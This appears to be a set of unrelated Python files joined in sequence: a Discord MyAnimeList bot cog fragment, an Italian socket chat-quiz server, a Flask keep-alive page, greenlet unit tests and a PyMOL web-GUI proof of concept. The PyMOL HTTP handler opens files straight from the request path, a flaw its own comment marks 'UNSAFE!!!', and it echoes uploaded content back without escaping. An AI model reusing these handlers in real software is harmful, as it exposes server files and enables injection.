jikanCall(self.jikan.user, username=profile, request='animelist', argument='watching')['anime'] ptw = jikanCall(self.jikan.user, username=profile, request='animelist', argument='ptw')['anime'] reading = jikanCall(self.jikan.user, username=profile, request='mangalist', argument='reading')['manga'] ptr = jikanCall(self.jikan.user, username=profile, request='mangalist', argument='ptr')['manga'] pbar = None if self.progress: # Set up progressbar in case it is the first time setting the user's profile logger.info(f"Setting up progressbar") pbar = tqdm( total=len(watching) + len(ptw) + len(reading) + len(ptr), file=self.progress, ncols=40, bar_format="⌛{desc}: {n_fmt}/{total_fmt} [Remaining: {remaining}]" ) for anime in watching + ptw: anime['title_english'] = jikanCall(self.jikan.anime, id=anime['mal_id'])['title_english'] newAnimeList.append(anime) if self.progress: self.progress.truncate(0) # clear previous output self.progress.seek(0) pbar.update() for manga in reading + ptr: manga['title_english'] = jikanCall(self.jikan.manga, id=manga['mal_id'])['title_english'] newMangaList.append(manga) if self.progress: self.progress.truncate(0) self.progress.seek(0) pbar.update() # If for some reason, we cannot retrieve the new lists (e.g. API error), keep the old ones # In other words, only update the lists if we can retrieve the new ones if newAnimeList: logger.info(f"Setting new anime list ({len(newAnimeList)} entries)") self.bot.get_cog('AnimeCog').list = newAnimeList else: logger.error("Empty anime list") if newMangaList: logger.info(f"Setting new manga list ({len(newMangaList)} entries)") self.bot.get_cog('MangaCog').list = newMangaList else: logger.error("Empty manga list") self.lastUpdated = datetime.now() except Exception as e: # There's nothing we can do :'( logger.error(f"Error when updating MAL profile: {str(e)}") if self.progress: self.progress.close() self.progress = None # no need in the future (only need progressbar for the first set up) def _getMember(self, user): """ Get the Discord member object, give its name and tag. :param user: The user (name + tag). :return: The member object, if none can be found, return None. """ logger.info(f"Getting discord user: {user}") for member in self.bot.get_all_members(): if str(member) == user: return member logger.error(f"Did not find discord user: {user}") return None def _getChannel(self, channelName): """ Get the Discord channel object, give the name of the channel. :param channelName: The name of the channel. :return: The channel object, if none can be found, return None. """ logger.info(f"Getting discord channel: {channelName}") for channel in self.bot.get_all_channels(): if str(channel) == channelName: return channel logger.error(f"Did not find discord channel: {channelName}") return None @commands.command(brief='Set your MAL profile') async def setProfile(self, ctx, profile: str): """ Set the internal MAL account, as well as the discord account and bot channel. :param ctx: The context. :param profile: Name of the MAL account. """ logger.info("Receiving setProfile command") try: self.malUser = self._getMALProfile(profile) except jikanpy.exceptions.APIException: logger.error(f'Unable to find user {profile}, make sure the profile is public.') await ctx.send(f'Unable to find user {profile}, make sure the profile is public.') return self.progress = io.StringIO("⌛ Please wait a bit") # start new profile logger.info("Setting up new profile") self.bot.get_cog('AnimeCog').list = [] self.bot.get_cog('MangaCog').list = [] self.discordUser = str(ctx.author.mention) if self.channel is None: self.channel = ctx.channel self.bot.get_cog('DatabaseCog').updateValue("channel", str(self.channel)) self.bot.get_cog('DatabaseCog').setProfile(profile, self.discordUser) thread = Thread(target=self._updateMALProfile, args=(profile,)) thread.start() logger.info("Successfully set profile") await ctx.send( '🎉 Successfully set profile, you\'ll now receive notifications for new anime episodes and manga chapters!\n' '🍵 It still may take some time for your profile to update though.' ) @commands.command(brief='Remove your MAL profile from the bot') async def removeProfile(self, ctx): logger.info("Receiving removeProfile command") self.bot.get_cog('DatabaseCog').setProfile("", "") self.discordUser = None self.malUser = None self.channel = None self.bot.get_cog('AnimeCog').list = [] self.bot.get_cog('MangaCog').list = [] logger.info("Successfully removed profile") await ctx.send('😢 Successfully removed you from the bot!') @commands.command(brief='Get a brief overview of your MAL profile') async def getProfile(self, ctx): """ Get the MAL profile in form of an embed :param ctx: The context. """ logger.info("Receiving getProfile command") if self.progress and self.malUser: logger.warning(f"Profile is currently being set") embed = discord.Embed(title=self.malUser['username'], color=discord.Color.green(), url=self.malUser['url']) embed.add_field(name="🔧 Setting up profile", value=str(self.progress.getvalue())) if self.malUser['image_url']: embed.set_thumbnail(url=self.malUser['image_url']) await ctx.send(embed=embed) elif self.malUser: embed = discord.Embed(title=self.malUser['username'], color=discord.Color.green(), url=self.malUser['url']) embed.add_field(name="Currently Watching / Plan-to-Watch Anime", value=str(len(self.bot.get_cog('AnimeCog').list)), inline=False) embed.add_field(name="Currently Reading / Plan-to-Read Manga", value=str(len(self.bot.get_cog('MangaCog').list)), inline=False) if self.lastUpdated: now = datetime.now() + timedelta(seconds=60 * 3.4) embed.set_footer(text=f"Last updated: {timeago.format(self.lastUpdated, now)}") if self.malUser['image_url']: embed.set_thumbnail(url=self.malUser['image_url']) await ctx.send(embed=embed) else: logger.error("Profile is not set") await ctx.send("Profile is not set, please use `!setProfile <USERNAME>` first.") @commands.command(brief='Set the bot channel (where it will ping you)') async def setChannel(self, ctx, channel: discord.TextChannel): """ Set the bot channel. :param ctx: The context. :param channel: Name of the bot channel. """ logger.info("Receiving setChannel command") self.channel = channel self.bot.get_cog('DatabaseCog').updateValue("channel", str(channel)) logger.info(f"Successfully set bot channel to {str(channel)}") await ctx.send(f'📺 Successfully set bot channel to {channel.mention}.') @commands.command(brief='Set the prefix of the bot') async def setPrefix(self, ctx, prefix: str): """ Set the prefix of the bot :param ctx: The context. :param prefix: The new prefix for the bot. """ logger.info("Receiving setPrefix command") self.bot.command_prefix = prefix self.bot.get_cog('DatabaseCog').updateValue("prefix", prefix) logger.info(f"Successfully set the prefix to {prefix}") await ctx.send(f'❗ Successfully set the prefix to `{prefix}`.') @setChannel.error async def setChannelError(self, ctx, error): """ Error Handler for setChannel. :param ctx: The context. :param error: The error raised. """ logger.error(f"Error when setting the channel: {error.args[0]}") await ctx.send(error.args[0]) @tasks.loop(hours=3) async def updateMalProfileLoop(self): """ Loop that periodically updates the MAL account, i.e. update watching/reading list. """ if self.malUser: thread = Thread(target=self._updateMALProfile, args=(self.malUser['username'],)) thread.start() else: logger.error("Cannot update MAL profile, profile is not set")
chat_server.py
#!/usr/bin/env python3 """Script Python : Server multithread per Chatgame - Nave pirata. Corso di Programmazione di Reti - Università di Bologna""" import sys import random as rnd from socket import AF_INET, socket, SOCK_STREAM from threading import Thread from time import sleep from collections import defaultdict def server_func(host, port): """ Funzione che accetta le connessioni dei client in entrata.""" def accept_incoming_connections(): while playing: client, client_address = SERVER.accept() print("%s:%s si è collegato." % client_address) if(not roles): # Comunico al client che non ci sono ruoli disponibili client.send(bytes(prefix + "Al momento non ci sono più ruoli disponibili, riprovo tra poco...", "utf8")) # Comunico al client che deve uscire client.send(bytes("\n{quit}", "utf8")) # Chiudo il client client.close() print("%s:%s è uscito." % client_address) sleep(5) continue client.send(bytes(prefix + "Benvenuto nella nave!", "utf8")) # Uso un dizionario per registrare i client addresses[client] = client_address # Avvio Thread - uno per ciascun client Thread(target=handle_client, args=(client,)).start() """ Funzione che gestisce la connessione di un singolo client.""" def handle_client(client): # Prende il socket del client come argomento della funzione. # Estraggo il ruolo casualmente e lo rimuovo dalla lista dei ruoli disponibili role = rnd.choice(roles) roles.remove(role) # Invio il ruolo al client client.send(bytes(prefix + "Il tuo ruolo è : %s." % role, "utf8")) # Aggiorno il dizionario dei clients clients[client] = role # Assegno al client il punteggio iniziale (0) scores[client] = 0 # Notifico tutti i client connessi che un nuovo ruolo è stato assegnato broadcast("%s si è unito!" % role) # Ciclo che chiede il quiz al client finchè non viene eliminato o scade il tempo while(playing and client in scores): quiz(client) # Controllo se il tempo è scaduto, in tal caso, esco dalla funzione if not playing: return # Dato che il client è uscito dal ciclo e il tempo non è scaduto, allora # vuol dire che è stato eliminato... # Attendo un po' prima di espellere sleep(3) # Comunico al client che deve uscire client.send(bytes("\n{quit}", "utf8")) # Chiudo il socket del client client.close() print("%s:%s uscito." % (addresses[client])) # Rimuovo il client dai vari dizionari del addresses[client] del clients[client] # Comunico a tutti che il client è stato eliminato broadcast("%s è uscito." % role) # Rendo disponibile il ruolo del client espulso roles.append(role) ''' Funzione che fa il quiz al client ''' def quiz(client): menu = "Scegli una delle opzioni: 1 2 3" # Chiedo scelta menù client.send(bytes(prefix + menu, "utf8")) valid = False # Booleano che mi indica se l'input del client è valido while(not valid): # Aspetto di ricevere la scelta dal client choice = client.recv(BUFSIZ).decode("utf8") # Controllo se input valido if choice and (choice[0] == '1' or choice[0] == '2' or choice[0] == '3') : #rnd.shuffle(options) # Mischio la lista con le 3 opzioni option = get_options()[int(choice[0]) - 1] valid = True elif choice == "{quit}": # Controllo se è stata chiesta la disconnessione option = "Uscita in corso..." valid = True else: # Se l'input non è valido, invio il menu con la richiesta option = "Input non valido. " + menu # Mando la scelta al client oppure richiedo con menù client.send(bytes(prefix + option, "utf8")) # Se è stata scelta una delle domande allora faccio il controllo della risposta if(option in answers): check_answer(client, option) else : # È stato beccato il trabocchetto --> Espulsione del client del scores[client] ''' Funzione che controlla se il client risponde correttamente alla domanda in input''' def check_answer(client, question): # Controllo se è effettivamente una delle domande if (question in questions): # Chiedo il client la risposta alla domanda answer = client.recv(BUFSIZ).decode("utf8") if answer == answers[question] : result = "Indovinato! Hai guadagnato un punto!" point = 1 elif answer == "{quit}": del scores[client] else : result = "Sbagliato! Hai perso un punto!" point = -1 # Invio al client il risultato della sua risposta client.send(bytes(prefix + result, "utf8")) # Incremento o decremento il punteggio del client in base alla risposta data scores[client] += point """ Funzione con cui il Server invia un messaggio in broadcast a tutti i client.""" def broadcast(msg): for utente in clients: utente.send(bytes("\n" + msg, "utf8")) ''' Funzione per timer''' def countdown(timer): if(timer < 0): print("Valore timer negativo") exit() while timer > - 1 : print(timer) sleep(1) timer -= 1 ''' Funzione per avere una lista dei massimi elementi di un dizionario''' def get_max_value(data): if not data : # Dizionario vuoto return [] d = defaultdict(list) # Dizionario ausiliario che vado a riempire for key, value in data.items(): # Ciclo in cui costruisco un dizionario partendo dai valori d[value].append(key) return max(d.items())[1] # Prendo solo le chiavi con valori massimi ''' Funzione per avere una lista dei ruoli vincitori ''' def get_winners(): list = [] for v in get_max_value(scores): # Prendo i client con punteggio più alto list.append(clients[v]) # e metto i relativi ruoli in una lista return list ''' Funzione per ottenere la lista delle 3 scelte del menù ''' def get_options(): # Estraggo due domande a caso o = [rnd.choice(questions), rnd.choice(questions), trick] rnd.shuffle(o) # Mischio la lista return o clients = {} # Dizionario in cui salvo il ruolo di ciascun Client addresses = {} # Dizionario in cui salvo l'indirizzo di ciascun Client scores = {} # Dizionario in cui salvo il punteggio di ciascun Client HOST = host # Da input PORT = port # Da inpur BUFSIZ = 1024 ADDR = (HOST, PORT) # Creo socket server per connessione TCP SERVER = socket(AF_INET, SOCK_STREAM) # Lego il socket con l'indirizzo dato in input SERVER.bind(ADDR) # Prefisso dei messaggi del Server sulle chat dei client prefix = "\nMaster(Server):" # Lista contenente i vari ruoli disponibili roles = ["Il Capitano", "Lo Spadaccino", "Il Navigatore", "Il Cecchino", "Il Cuoco", "Il Dottore", "L'Archeologo", "Il Carpentiere", "Il Musicista", "Il Timoniere"] # Prefisso per le domande dei quiz pre_domanda = "Domanda(Rispondi con la lettera selezionata) - " q1 = pre_domanda + "Come si chiama questo corso?\n---------a)Programmazione di Reti\n---------b)Basi di Dati\n---------c)Sistemi Operativi" q2 = pre_domanda + "Quanti CFU ha questo corso?\n---------a)3CFU\n---------b)6CFU\n---------c)9CFU" q3 = pre_domanda + "Il linguaggio scelto per il laboratorio è:\n---------a)C#\n---------b)Python\n---------c)Java" q4 = pre_domanda + "Quali sono i professori di questo corso?\n---------a)Mirko Viroli-Pianini Danilo\n---------b)Maio Dario-Franco Annalisa\n---------c)Pau Giovanni- Piroddi Andrea" q5 = pre_domanda + "Le lezioni del corso sono state svolte sulla piattaforma:\n---------a)Teams\n---------b)Zoom\n---------c)Meet" # Lista che contiene le domande questions = [q1, q2, q3, q4, q5] # Dizionario in cui ogni domanda ha la sua risposta corretta answers = {q1 : "a", q2 : "b", q3 : "b", q4 : "c", q5 : "a"} # Opzione Trabocchetto trick = "Trabocchetto - Sei eliminato!" # Tempo del gioco timer = 100 # Booleano che indica se il gioco è in corso oppure no (Tempo scaduto) playing = True SERVER.listen(5) print("In attesa di connessioni...") # Creo Thread in cui il Server accetta i client che si collegano ACCEPT_THREAD = Thread(target=accept_incoming_connections) ACCEPT_THREAD.start() TIMER_THREAD = Thread(target=countdown(timer)) TIMER_THREAD.start() TIMER_THREAD.join() # Attendo il termine del thread del timer playing = False # Tempo Scaduto print("Timer finito") broadcast(prefix + "Tempo Scaduto!") SERVER.close() # Chiudo il server #-----Calcolo dei vincitori winners = get_winners() # In base al numero dei vincitori mando il messaggio idoneo if(not winners): final_msg = "Non ci sono vincitori" elif(len(winners) == 1): final_msg = ("Il vincitore è " + winners[0]) else : final_msg = "I vincitori sono " + ', '.join(winners) # Comunico i vincitori print(final_msg) broadcast(prefix + final_msg) # Stampo messaggio di avviso nel caso qualcuno tentasse di eseguire questa classe # come uno script normale if __name__ == "__main__": print("File non eseguibile")
webserver.py
# -- Importing Packages -- # from flask import Flask from threading import Thread from logging import getLogger, ERROR # -- Disables Flask App Logging -- # log = getLogger('werkzeug') log.setLevel(ERROR) # - Webserver Setup -- # app = Flask('') @app.route('/') def home(): return '<h1> Hosting Active </h1><p>This bot is made by RLX, So make sure to credit RLX/RLX Team</p><p>Join the discord server now - https://discord.gg/SN3mZPxjEW</p>' def run(): app.run(host='0.0.0.0', port=8080) def keep_alive(): t = Thread(target=run) t.start()
test_greenlet.py
import gc import sys import time import threading import unittest from abc import ABCMeta, abstractmethod from greenlet import greenlet class SomeError(Exception): pass def fmain(seen): try: greenlet.getcurrent().parent.switch() except: seen.append(sys.exc_info()[0]) raise raise SomeError def send_exception(g, exc): # note: send_exception(g, exc) can be now done with g.throw(exc). # the purpose of this test is to explicitely check the propagation rules. def crasher(exc): raise exc g1 = greenlet(crasher, parent=g) g1.switch(exc) class GreenletTests(unittest.TestCase): def test_simple(self): lst = [] def f(): lst.append(1) greenlet.getcurrent().parent.switch() lst.append(3) g = greenlet(f) lst.append(0) g.switch() lst.append(2) g.switch() lst.append(4) self.assertEqual(lst, list(range(5))) def test_parent_equals_None(self): g = greenlet(parent=None) self.assertIsNotNone(g) self.assertIs(g.parent, greenlet.getcurrent()) def test_run_equals_None(self): g = greenlet(run=None) self.assertIsNotNone(g) self.assertIsNone(g.run) def test_two_children(self): lst = [] def f(): lst.append(1) greenlet.getcurrent().parent.switch() lst.extend([1, 1]) g = greenlet(f) h = greenlet(f) g.switch() self.assertEqual(len(lst), 1) h.switch() self.assertEqual(len(lst), 2) h.switch() self.assertEqual(len(lst), 4) self.assertEqual(h.dead, True) g.switch() self.assertEqual(len(lst), 6) self.assertEqual(g.dead, True) def test_two_recursive_children(self): lst = [] def f(): lst.append(1) greenlet.getcurrent().parent.switch() def g(): lst.append(1) g = greenlet(f) g.switch() lst.append(1) g = greenlet(g) g.switch() self.assertEqual(len(lst), 3) self.assertEqual(sys.getrefcount(g), 2) def test_threads(self): success = [] def f(): self.test_simple() success.append(True) ths = [threading.Thread(target=f) for i in range(10)] for th in ths: th.start() for th in ths: th.join() self.assertEqual(len(success), len(ths)) def test_exception(self): seen = [] g1 = greenlet(fmain) g2 = greenlet(fmain) g1.switch(seen) g2.switch(seen) g2.parent = g1 self.assertEqual(seen, []) self.assertRaises(SomeError, g2.switch) self.assertEqual(seen, [SomeError]) g2.switch() self.assertEqual(seen, [SomeError]) def test_send_exception(self): seen = [] g1 = greenlet(fmain) g1.switch(seen) self.assertRaises(KeyError, send_exception, g1, KeyError) self.assertEqual(seen, [KeyError]) def test_dealloc(self): seen = [] g1 = greenlet(fmain) g2 = greenlet(fmain) g1.switch(seen) g2.switch(seen) self.assertEqual(seen, []) del g1 gc.collect() self.assertEqual(seen, [greenlet.GreenletExit]) del g2 gc.collect() self.assertEqual(seen, [greenlet.GreenletExit, greenlet.GreenletExit]) def test_dealloc_other_thread(self): seen = [] someref = [] lock = threading.Lock() lock.acquire() lock2 = threading.Lock() lock2.acquire() def f(): g1 = greenlet(fmain) g1.switch(seen) someref.append(g1) del g1 gc.collect() lock.release() lock2.acquire() greenlet() # trigger release lock.release() lock2.acquire() t = threading.Thread(target=f) t.start() lock.acquire() self.assertEqual(seen, []) self.assertEqual(len(someref), 1) del someref[:] gc.collect() # g1 is not released immediately because it's from another thread self.assertEqual(seen, []) lock2.release() lock.acquire() self.assertEqual(seen, [greenlet.GreenletExit]) lock2.release() t.join() def test_frame(self): def f1(): f = sys._getframe(0) # pylint:disable=protected-access self.assertEqual(f.f_back, None) greenlet.getcurrent().parent.switch(f) return "meaning of life" g = greenlet(f1) frame = g.switch() self.assertTrue(frame is g.gr_frame) self.assertTrue(g) from_g = g.switch() self.assertFalse(g) self.assertEqual(from_g, "meaning of life") self.assertEqual(g.gr_frame, None) def test_thread_bug(self): def runner(x): g = greenlet(lambda: time.sleep(x)) g.switch() t1 = threading.Thread(target=runner, args=(0.2,)) t2 = threading.Thread(target=runner, args=(0.3,)) t1.start() t2.start() t1.join() t2.join() def test_switch_kwargs(self): def run(a, b): self.assertEqual(a, 4) self.assertEqual(b, 2) return 42 x = greenlet(run).switch(a=4, b=2) self.assertEqual(x, 42) def test_switch_kwargs_to_parent(self): def run(x): greenlet.getcurrent().parent.switch(x=x) greenlet.getcurrent().parent.switch(2, x=3) return x, x ** 2 g = greenlet(run) self.assertEqual({"x": 3}, g.switch(3)) self.assertEqual(((2,), {"x": 3}), g.switch()) self.assertEqual((3, 9), g.switch()) def test_switch_to_another_thread(self): data = {} error = None created_event = threading.Event() done_event = threading.Event() def run(): data["g"] = greenlet(lambda: None) created_event.set() done_event.wait() thread = threading.Thread(target=run) thread.start() created_event.wait() try: data["g"].switch() except greenlet.error: error = sys.exc_info()[1] self.assertIsNotNone(error, "greenlet.error was not raised!") done_event.set() thread.join() def test_exc_state(self): def f(): try: raise ValueError("fun") except: # pylint:disable=bare-except exc_info = sys.exc_info() greenlet(h).switch() self.assertEqual(exc_info, sys.exc_info()) def h(): self.assertEqual(sys.exc_info(), (None, None, None)) greenlet(f).switch() def test_instance_dict(self): def f(): greenlet.getcurrent().test = 42 def deldict(g): del g.__dict__ def setdict(g, value): g.__dict__ = value g = greenlet(f) self.assertEqual(g.__dict__, {}) g.switch() self.assertEqual(g.test, 42) self.assertEqual(g.__dict__, {"test": 42}) g.__dict__ = g.__dict__ self.assertEqual(g.__dict__, {"test": 42}) self.assertRaises(TypeError, deldict, g) self.assertRaises(TypeError, setdict, g, 42) def test_threaded_reparent(self): data = {} created_event = threading.Event() done_event = threading.Event() def run(): data["g"] = greenlet(lambda: None) created_event.set() done_event.wait() def blank(): greenlet.getcurrent().parent.switch() def setparent(g, value): g.parent = value thread = threading.Thread(target=run) thread.start() created_event.wait() g = greenlet(blank) g.switch() self.assertRaises(ValueError, setparent, g, data["g"]) done_event.set() thread.join() def test_deepcopy(self): import copy self.assertRaises(TypeError, copy.copy, greenlet()) self.assertRaises(TypeError, copy.deepcopy, greenlet()) def test_parent_restored_on_kill(self): hub = greenlet(lambda: None) main = greenlet.getcurrent() result = [] def worker(): try: # Wait to be killed main.switch() except greenlet.GreenletExit: # Resurrect and switch to parent result.append(greenlet.getcurrent().parent) result.append(greenlet.getcurrent()) hub.switch() g = greenlet(worker, parent=hub) g.switch() del g self.assertTrue(result) self.assertEqual(result[0], main) self.assertEqual(result[1].parent, hub) def test_parent_return_failure(self): # No run causes AttributeError on switch g1 = greenlet() # Greenlet that implicitly switches to parent g2 = greenlet(lambda: None, parent=g1) # AttributeError should propagate to us, no fatal errors self.assertRaises(AttributeError, g2.switch) def test_throw_exception_not_lost(self): class mygreenlet(greenlet): def __getattribute__(self, name): try: raise Exception() except: # pylint:disable=bare-except pass return greenlet.__getattribute__(self, name) g = mygreenlet(lambda: None) self.assertRaises(SomeError, g.throw, SomeError()) def test_throw_doesnt_crash(self): result = [] def worker(): greenlet.getcurrent().parent.switch() def creator(): g = greenlet(worker) g.switch() result.append(g) t = threading.Thread(target=creator) t.start() t.join() self.assertRaises(greenlet.error, result[0].throw, SomeError()) def test_recursive_startup(self): class convoluted(greenlet): def __init__(self): greenlet.__init__(self) self.count = 0 def __getattribute__(self, name): if name == "run" and self.count == 0: self.count = 1 self.switch(43) return greenlet.__getattribute__(self, name) def run(self, value): while True: self.parent.switch(value) g = convoluted() self.assertEqual(g.switch(42), 43) def test_unexpected_reparenting(self): another = [] def worker(): g = greenlet(lambda: None) another.append(g) g.switch() t = threading.Thread(target=worker) t.start() t.join() class convoluted(greenlet): def __getattribute__(self, name): if name == "run": self.parent = another[ 0 ] # pylint:disable=attribute-defined-outside-init return greenlet.__getattribute__(self, name) g = convoluted(lambda: None) self.assertRaises(greenlet.error, g.switch) def test_threaded_updatecurrent(self): # released when main thread should execute lock1 = threading.Lock() lock1.acquire() # released when another thread should execute lock2 = threading.Lock() lock2.acquire() class finalized(object): def __del__(self): # happens while in green_updatecurrent() in main greenlet # should be very careful not to accidentally call it again # at the same time we must make sure another thread executes lock2.release() lock1.acquire() # now ts_current belongs to another thread def deallocator(): greenlet.getcurrent().parent.switch() def fthread(): lock2.acquire() greenlet.getcurrent() del g[0] lock1.release() lock2.acquire() greenlet.getcurrent() lock1.release() main = greenlet.getcurrent() g = [greenlet(deallocator)] g[0].bomb = finalized() g[0].switch() t = threading.Thread(target=fthread) t.start() # let another thread grab ts_current and deallocate g[0] lock2.release() lock1.acquire() # this is the corner stone # getcurrent() will notice that ts_current belongs to another thread # and start the update process, which would notice that g[0] should # be deallocated, and that will execute an object's finalizer. Now, # that object will let another thread run so it can grab ts_current # again, which would likely crash the interpreter if there's no # check for this case at the end of green_updatecurrent(). This test # passes if getcurrent() returns correct result, but it's likely # to randomly crash if it's not anyway. self.assertEqual(greenlet.getcurrent(), main) # wait for another thread to complete, just in case t.join() def test_dealloc_switch_args_not_lost(self): seen = [] def worker(): # wait for the value value = greenlet.getcurrent().parent.switch() # delete all references to ourself del worker[0] initiator.parent = greenlet.getcurrent().parent # switch to main with the value, but because # ts_current is the last reference to us we # return immediately try: greenlet.getcurrent().parent.switch(value) finally: seen.append(greenlet.getcurrent()) def initiator(): return 42 # implicitly falls thru to parent worker = [greenlet(worker)] worker[0].switch() # prime worker initiator = greenlet(initiator, worker[0]) value = initiator.switch() self.assertTrue(seen) self.assertEqual(value, 42) def test_tuple_subclass(self): if sys.version_info[0] > 2: # There's no apply in Python 3.x def _apply(func, a, k): func(*a, **k) else: _apply = apply # pylint:disable=undefined-variable class mytuple(tuple): def __len__(self): greenlet.getcurrent().switch() return tuple.__len__(self) args = mytuple() kwargs = dict(a=42) def switchapply(): _apply(greenlet.getcurrent().parent.switch, args, kwargs) g = greenlet(switchapply) self.assertEqual(g.switch(), kwargs) def test_abstract_subclasses(self): AbstractSubclass = ABCMeta( "AbstractSubclass", (greenlet,), {"run": abstractmethod(lambda self: None)} ) class BadSubclass(AbstractSubclass): pass class GoodSubclass(AbstractSubclass): def run(self): pass GoodSubclass() # should not raise self.assertRaises(TypeError, BadSubclass) def test_implicit_parent_with_threads(self): if not gc.isenabled(): return # cannot test with disabled gc N = gc.get_threshold()[0] if N < 50: return # cannot test with such a small N def attempt(): lock1 = threading.Lock() lock1.acquire() lock2 = threading.Lock() lock2.acquire() recycled = [False] def another_thread(): lock1.acquire() # wait for gc greenlet.getcurrent() # update ts_current lock2.release() # release gc t = threading.Thread(target=another_thread) t.start() class gc_callback(object): def __del__(self): lock1.release() lock2.acquire() recycled[0] = True class garbage(object): def __init__(self): self.cycle = self self.callback = gc_callback() l = [] x = range(N * 2) current = greenlet.getcurrent() g = garbage() for _ in x: g = None # lose reference to garbage if recycled[0]: # gc callback called prematurely t.join() return False last = greenlet() if recycled[0]: break # yes! gc called in green_new l.append(last) # increase allocation counter else: # gc callback not called when expected gc.collect() if recycled[0]: t.join() return False self.assertEqual(last.parent, current) for g in l: self.assertEqual(g.parent, current) return True for _ in range(5): if attempt(): break class TestRepr(unittest.TestCase): def assertEndsWith(self, got, suffix): self.assertTrue(got.endswith(suffix), (got, suffix)) def test_main_while_running(self): r = repr(greenlet.getcurrent()) self.assertEndsWith(r, " current active started main>") def test_main_in_background(self): main = greenlet.getcurrent() def run(): return repr(main) g = greenlet(run) r = g.switch() self.assertEndsWith(r, " suspended active started main>") def test_initial(self): r = repr(greenlet()) self.assertEndsWith(r, " pending>") def test_main_from_other_thread(self): main = greenlet.getcurrent() class T(threading.Thread): original_main = thread_main = None main_glet = None def run(self): self.original_main = repr(main) self.main_glet = greenlet.getcurrent() self.thread_main = repr(self.main_glet) t = T() t.start() t.join(10) self.assertEndsWith(t.original_main, " suspended active started main>") self.assertEndsWith(t.thread_main, " current active started main>") r = repr(t.main_glet) # main greenlets, even from dead threads, never really appear dead # TODO: Can we find a better way to differentiate that? assert not t.main_glet.dead self.assertEndsWith(r, " suspended active started main>") def test_dead(self): g = greenlet(lambda: None) g.switch() self.assertEndsWith(repr(g), " dead>") self.assertNotIn("suspended", repr(g)) self.assertNotIn("started", repr(g)) self.assertNotIn("active", repr(g)) def test_formatting_produces_native_str(self): # https://github.com/python-greenlet/greenlet/issues/218 # %s formatting on Python 2 was producing unicode, not str. g_dead = greenlet(lambda: None) g_not_started = greenlet(lambda: None) g_cur = greenlet.getcurrent() for g in g_dead, g_not_started, g_cur: self.assertIsInstance("%s" % (g,), str) self.assertIsInstance( "%r" % (g,), str, ) if __name__ == "__main__": unittest.main()
webgui01.py
try: import BaseHTTPServer except ImportError: import http.server as BaseHTTPServer import time import cgi import threading import traceback from pymol import cmd _server = None def _shutdown(self_cmd=cmd): if _server != None: _server.socket.close() self_cmd.quit() # Note, this handler assumes PyMOL is running as a global singleton def get_status(out, self_cmd=cmd): out.write('<html>\n') out.write('<header>\n') out.write('<script type="text/javascript" src="pymol.js"></script>\n') out.write('</header><body>\n') out.write('<h3>PyMOL WebGUI Proof of Concept</h3>\n') out.write('<table><tr>\n') out.write('<td><form action="./status.pymol"><button type="submit">Refresh</button></form></td>\n') out.write('<td><form target="_new" action="./ray.pymol?t=%f"><button type="submit">Ray</button></form></td>\n'% time.time()) out.write('<td><form target="_new" action="./monitor.pymol?t=%f"><button type="submit">Monitor</button></form></td>\n'% time.time()) out.write('<td><form action="./quit.pymol"><button type="submit">Quit</button></form></td>\n') out.write('</tr></table>') out.write('<a href="./status.pymol?load">load $TUT/1hpv.pdb</a>\n') names = self_cmd.get_names('objects') if not len(names): out.write('<p>No objects loaded.</p>\n') else: out.write('<p>Loaded Objects:</p><ul>\n') for name in names: out.write('<li>%s</li>\n'%name) out.write('</ul>\n') out.write('<a href="#" onClick="updateImage()"><img src="./draw.pymol?t=%f">'%time.time()+"</img></a>") out.write('</body></html>\n') def get_monitor(out, self_cmd=cmd): out.write('<html>\n') out.write('<header>\n') out.write('<script type="text/javascript" src="pymol.js"></script>\n') out.write('</header><body onload="monitorOnLoad()">\n') out.write('<img src="./draw.pymol?t=%f">'%time.time()+"</img>") out.write('</body></html>\n') def get_start(out, self_cmd=cmd): window_open="javascript: window.open('./status.pymol','hello', 'location=no,toolbar=no,width=400,height=600,top=0,left=880');" out.write('<html><body onload="'+window_open+'">\n') out.write('<a href="./start.pymol" onclick="'+window_open+'">Launch WebGUI\n') out.write('</body></html>') def write_image(out, ray=0, self_cmd=cmd): if ray: self_cmd.ray() # encode the file descriptor into the PNG filename if self_cmd.png(chr(1)+str(out.fileno()),prior=-1) != 1: # no prior image available, so wait for update / finish self_cmd.sync() class PymolHandler(BaseHTTPServer.BaseHTTPRequestHandler): def log_message(self, format, *args): pass # nuke logging feature for the time being def do_js(self): self.send_response(200) self.send_header('Content-type','text/javascript') self.end_headers() self.wfile.write(''' function updateImage() { images = document.getElementsByTagName("img"); for( var i = 0; i < images.length; i++ ) { images[i].src = "./draw.pymol?t=" + new Date().getTime(); } return false; } function monitorOnLoad(event) { setInterval('updateImage()',1000) } ''') def do_pymol(self): if "ray.pymol" in self.path: # send image self.send_response(200) self.send_header('Content-type', 'image/x-png') self.send_header('Cache-control', 'no-cache') self.send_header('Pragma', 'no-cache') self.end_headers() write_image(self.wfile,1) elif "draw.pymol" in self.path: self.send_response(200) self.send_header('Content-type', 'image/x-png') self.send_header('Cache-control', 'no-cache') self.send_header('Pragma', 'no-cache') self.end_headers() write_image(self.wfile) else: if "load" in self.path: # load a structure cmd.load("$TUT/1hpv.pdb") cmd.rock() self.send_response(200) self.send_header('Content-type', 'text/html') self.end_headers() if "status.pymol" in self.path: get_status(self.wfile) elif "monitor.pymol" in self.path: get_monitor(self.wfile) elif "quit.pymol" in self.path: self.wfile.write('<html><body><p>Quitting...</p></body></html>') self.wfile.flush() _shutdown() else: # start page get_start(self.wfile) self.wfile.flush() def do_GET(self): try: doc = self.path.split('?')[0] if doc.endswith('.pymol'): # PyMOL try: self.do_pymol() except: traceback.print_exc() elif doc.endswith('.js'): # Javascript self.do_js() elif doc.endswith('.html'): f = open('.'+self.path) # UNSAFE!!! self.send_response(200) self.send_header('Content-type', 'text/html') self.end_headers() self.wfile.write(f.read()) f.close() except IOError: self.send_error(404,'File Not Found: %s' % self.path) def do_POST(self): global rootnode try: ctype, pdict = cgi.parse_header(self.headers.getheader('content-type')) if ctype == 'multipart/form-data': query=cgi.parse_multipart(self.rfile, pdict) self.send_response(301) self.end_headers() upfilecontent = query.get('upfile') print("filecontent", upfilecontent[0]) self.wfile.write('<HTML>POST OK.<BR><BR>'); self.wfile.write(upfilecontent[0]); except : pass def main(): try: global _server _server = BaseHTTPServer.HTTPServer(('', 8080), PymolHandler) print('started httpserver...') _server.serve_forever() except KeyboardInterrupt: print('^C received, shutting down server') _server.socket.close() def open_browser(): import webbrowser time.sleep(1) webbrowser.open('http://localhost:8080/status.pymol') # import os # os.system('open http://localhost:8080/start.pymol') if __name__ == '__main__': main() if __name__ == 'pymol': cmd.set("image_copy_always") # copy 